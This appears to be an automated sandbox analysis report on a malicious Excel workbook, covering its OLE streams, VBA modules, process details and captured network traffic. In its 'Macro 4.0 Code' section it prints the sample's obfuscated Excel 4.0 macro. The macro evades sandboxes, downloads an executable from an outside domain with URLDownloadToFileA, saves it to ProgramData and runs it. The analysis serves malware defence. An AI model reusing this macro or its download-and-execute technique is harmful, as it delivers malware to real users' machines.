      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 216
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:216
      Entropy:3.65061706767
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . . . . . . . . . . H P P C . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . * M . . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a8 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 70 00 00 00 0c 00 00 00 88 00 00 00 0d 00 00 00 94 00 00 00 13 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 758471
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:758471
      Entropy:7.96834669995
      Base64 Encoded:True
      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . H P P C B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . 2 F C . 8 . . . . . . . X
      Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 48 50 20 50 43 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 501
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:501
      Entropy:5.22430114012
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F e u i l 1 / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F 7 F 5 5 B 5 6 A 5 B A 9 8 B E 9 8 B E 9 C C 2 9 C C 2 " . . D P B = " E E E C 4 2 6 F C E 9 1 D 8 A E D 8 A E 2 7 5 2
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 65 75 69 6c 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 56 42
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:62
      Entropy:3.11998328335
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . F e u i l 1 . F . e . u . i . l . 1 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 46 65 75 69 6c 31 00 46 00 65 00 75 00 69 00 6c 00 31 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2453
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:2453
      Entropy:3.93667032984
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
      Data Raw:cc 61 af 00 00 01 00 ff 0c 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 522
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/dir
      File Type:VAX-order 68k Blit mpx/mux executable
      Stream Size:522
      Entropy:6.33446971204
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . K . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
      Data Raw:01 06 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 4b fc ca 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

      Macro 4.0 Code

      ;;;;;;;;;;;;;;;"=IF(GET.WORKSPACE(1+18);;CLOSE(TRUE))";;;;"=IF(GET.WORKSPACE(30+12);;CLOSE(TRUE))";;;;;;;;"=IF(ISNUMBER(SEARCH(""32"";GET.WORKSPACE(1)));GOTO(B126);GOTO(C126))";;;=;;"=CHAR(67)&CHAR(65)&CHAR(76)&CHAR(76)&""(""""ur""""&CHAR(108)&""""mon"""",""""UR""""&CHAR(76)&""""Down""""&CHAR(108)&""""oadToFi""""&CHAR(108)&""""eA"""",""""JJCCJJ"""",0,CHAR(104)&""""ttps://www.seyranikenger.com.tr/mensajeria_system.exe"""",""""C:\"""" & Char(80) & Char(82) & """"OGRAMDATA\a.""""&CHAR(101)&""""xe"""")""";;;;"EXEC(""C:\""&CHAR(80)&CHAR(82)&""OGRAMDATA\a.""&CHAR(101)&""xe"")";;;;"=CHAR(67)&CHAR(65)&CHAR(76)&CHAR(76)&""(""""ur""""&CHAR(108)&""""mon"""",""""UR""""&CHAR(76)&""""Down""""&CHAR(108)&""""oadToFi""""&CHAR(108)&""""eA"""",""""BBCCBB"""",0,CHAR(104)&""""ttps://www.seyranikenger.com.tr/mensajeria_system.exe"""",""""C:\"""" & Char(80) & Char(82) & """"OGRAMDATA\a.""""&CHAR(101)&""""xe"""")""""=FORMULA.FILL(D123&F123;B127)";"=FORMULA.FILL(D123&F125;C127)";;;;;;;"=FORMULA.FILL(D123&F124;B129)";"=FORMULA.FILL(D123&F124;C129)";;;;;;;;;;;=CLOSE(FALSE);=CLOSE(FALSE);;;;;;;

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Feb 22, 2021 20:29:27.648983002 CET49167443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:27.742896080 CET44349167185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:27.743176937 CET49167443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:27.759762049 CET49167443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:27.851521015 CET44349167185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:27.851588011 CET44349167185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:27.851608992 CET44349167185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:27.851680994 CET49167443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:27.851742983 CET49167443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:27.851780891 CET44349167185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:27.851845026 CET49167443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:27.852747917 CET49167443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:27.852771997 CET49167443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:27.854356050 CET49168443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:27.941406012 CET44349168185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:27.941555977 CET49168443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:27.942599058 CET49168443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:27.945056915 CET44349167185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:27.945135117 CET49167443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:28.030073881 CET44349168185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:28.030098915 CET44349168185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:28.030174017 CET49168443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:28.030303001 CET44349168185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:28.030318975 CET44349168185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:28.030369043 CET49168443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:28.030576944 CET49168443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:28.030603886 CET49168443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:28.031795979 CET49169443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:28.115371943 CET44349168185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:28.115542889 CET49168443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:28.119436979 CET44349169185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:28.119607925 CET49169443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:28.119946957 CET49169443192.168.2.22185.162.146.6
      Feb 22, 2021 20:29:28.207520962 CET44349169185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:28.207573891 CET44349169185.162.146.6192.168.2.22
      Feb 22, 2021 20:29:28.209122896 CET49169443192.168.2.22185.162.146.6

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Feb 22, 2021 20:29:27.522520065 CET5219753192.168.2.228.8.8.8
      Feb 22, 2021 20:29:27.628372908 CET53521978.8.8.8192.168.2.22

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      Feb 22, 2021 20:29:27.522520065 CET192.168.2.228.8.8.80x6029Standard query (0)www.seyranikenger.com.trA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      Feb 22, 2021 20:29:27.628372908 CET8.8.8.8192.168.2.220x6029No error (0)www.seyranikenger.com.trseyranikenger.com.trCNAME (Canonical name)IN (0x0001)
      Feb 22, 2021 20:29:27.628372908 CET8.8.8.8192.168.2.220x6029No error (0)seyranikenger.com.tr185.162.146.6A (IP address)IN (0x0001)

      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      System Behavior

      General

      Start time:20:29:43
      Start date:22/02/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13fb30000
      File size:27641504 bytes
      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Disassembly

      Call Graph

      Graph

      • Entrypoint
      • Decryption Function
      • Executed
      • Not Executed
      • Show Help
      callgraph 18 a

      Module: Feuil1

      Declaration
      LineContent
      1

      Attribute VB_Name = "Feuil1"

      2

      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

      3

      Attribute VB_GlobalNameSpace = False

      4

      Attribute VB_Creatable = False

      5

      Attribute VB_PredeclaredId = True

      6

      Attribute VB_Exposed = True

      7

      Attribute VB_TemplateDerived = False

      8

      Attribute VB_Customizable = True

      Module: ThisWorkbook

      Declaration
      LineContent
      1

      Attribute VB_Name = "ThisWorkbook"

      2

      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

      3

      Attribute VB_GlobalNameSpace = False

      4

      Attribute VB_Creatable = False

      5

      Attribute VB_PredeclaredId = True

      6

      Attribute VB_Exposed = True

      7

      Attribute VB_TemplateDerived = False

      8

      Attribute VB_Customizable = True

      Non-Executed Functions
      LineInstructionMeta Information
      9

      Sub a()

      12

      End Sub

      Reset < >